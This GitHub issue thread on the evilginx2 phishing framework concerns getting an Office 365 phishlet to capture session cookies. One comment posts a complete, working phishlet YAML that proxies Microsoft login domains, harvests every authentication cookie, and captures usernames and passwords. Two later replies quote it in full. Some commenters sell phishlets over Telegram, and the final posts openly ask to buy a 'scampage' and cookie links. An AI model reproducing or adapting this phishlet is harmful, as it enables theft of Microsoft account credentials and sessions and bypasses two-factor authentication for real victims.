search

kgretzky / evilginx2

Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication
BSD 3-Clause "New" or "Revised" License
10.54k stars 1.91k forks source link

Is there a working o365 method that grabs cookies (I have tried all the suggestions). #764

Closed ghost closed 1 year ago

ghost commented 2 years ago

proxy_hosts:

auth_urls:

ghoxt007 commented 2 years ago

Got working phishlets for o365 captures cookies, telegram me @ghoxt007

ghost commented 2 years ago

@squodgeface be careful with sending any ₿₿₿ to these guys

did you try #760?

Onyinye10 commented 2 years ago

Seems like an issue with your authentication tokens but will have to see how your o365 phishlet is coded to tell

ghost commented 2 years ago

Auth URL: kmsi should end with an asterisk

/kmsi*

also are you sure you aren't using a live.com account to test? that would give cookies under a domain evilginx isn't listening for.

I can give you the phishlet as well if it's still not capturing

Kevin3-00 commented 2 years ago

Support was able to make my o365 phishlets forward results to mail and it was all on the .yaml best you work with some experience https://icq.im/mrgretzky could help fix your phishlet issue

Scammer noticed

ghost commented 2 years ago

Feel free to mark his messages. Anybody giving coins to that account deserves to lose them: "Talk to the author", spare me the laughter

ghoxt007 commented 2 years ago

working O365 phishlets captures cookies telegram me @ghoxt007

ghost commented 2 years ago

edit: see #778

Oskku commented 2 years ago

Lol don't telegram me, or anybody for it: here's the o365 that captures cookies. I also have one which removes and doesn't get stuck on the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (not even saying it support's all [non o365] emails)

name: "o365"
author: "@456478"
min_ver: "2.3.0"
proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false }

sub_filters:
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }

auth_tokens:
  - domain: ".microsoftonline.com"
    keys: [".*,regexp"]

force_post:
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"

auth_urls:
  - "/kmsi*"

credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
  password:
    key: '(passwd|Password)'
    search: '(.*)'

login:
  domain: "login.microsoftonline.com"
  path: "/"

office_demo30_800

When I open the Phishlets its works but when i click on sign in it give me no server found ?

c002 commented 2 years ago

i got it working, took me a few hours to figure it out, so pretty sure anyone else can get it working :)

schneider-san commented 2 years ago

I've been battling with it for over hours now. What did you do?

schneider-san commented 2 years ago

I finally got it working. Still having troubles with adfs.

schneider-san commented 2 years ago

i got it working, took me a few hours to figure it out, so pretty sure anyone else can get it working :)

Lol don't telegram me, or anybody for it: here's the o365 that captures cookies. I also have one which removes and doesn't get stuck on the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (not even saying it support's all [non o365] emails)

name: "o365"
author: "@456478"
min_ver: "2.3.0"
proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false }

sub_filters:
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }

auth_tokens:
  - domain: ".microsoftonline.com"
    keys: [".*,regexp"]

force_post:
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"

auth_urls:
  - "/kmsi*"

credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
  password:
    key: '(passwd|Password)'
    search: '(.*)'

login:
  domain: "login.microsoftonline.com"
  path: "/"

office_demo30_800

    [

        ![office_demo30_800](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)

    ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)

      [

      ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)

When I open the Phishlets its works but when i click on sign in it give me no server found ?

Were you able to make it work for adfs?

resultxa commented 1 year ago

Lol don't telegram me, or anybody for it: here's the o365 that captures cookies. I also have one which removes and doesn't get stuck on the long "Please wait, loading" modal, only captures the auth cookies (no regex) and has email prefill (not even saying it support's all [non o365] emails)

name: "o365"
author: "@456478"
min_ver: "2.3.0"
proxy_hosts:
  - { phish_sub: "login", orig_sub: "login", domain: "microsoftonline.com", session: true, is_landing: true, auto_filter: false }
  - { phish_sub: "www", orig_sub: "www", domain: "office.com", session: true, is_landing: false, auto_filter: false }
  - { phish_sub: "acc", orig_sub: "account", domain: "microsoft.com", session: true, is_landing: false, auto_filter: false }

sub_filters:
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "login", domain: "microsoftonline.com", search: "https://{hostname}", replace: "https://{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript], redirect_only: true }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "account", domain: "microsoft.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "application/json", "application/javascript", "application/x-javascript", text/javascript] }
  - { triggers_on: "login.microsoftonline.com", orig_sub: "www", domain: "office.com", search: "{hostname}", replace: "{hostname}", mimes: ["text/html", "text/javascript", "application/json"] }

auth_tokens:
  - domain: ".microsoftonline.com"
    keys: [".*,regexp"]

force_post:
  - path: "/ppsecure/post*"
    search:
      - { key: "LoginOptions", search: "1" }
    force:
      - { key: "DontShowAgain", value: "true" }
    type: "post"

auth_urls:
  - "/kmsi*"

credentials:
  username:
    key: '(login|UserName)'
    search: '(.*)'
  password:
    key: '(passwd|Password)'
    search: '(.*)'

login:
  domain: "login.microsoftonline.com"
  path: "/"

office_demo30_800

    [

        ![office_demo30_800](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)

    ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)

      [

      ](https://user-images.githubusercontent.com/33309474/167519686-856f1049-b435-4515-ab11-261ac9a4ea91.gif)

When I open the Phishlets its works but when i click on sign in it give me no server found ?

Can you share the scampage please? 🙏🏼

UnivelcityTech commented 6 months ago

Can you please the Scampage and the cookies link again i want to buy pls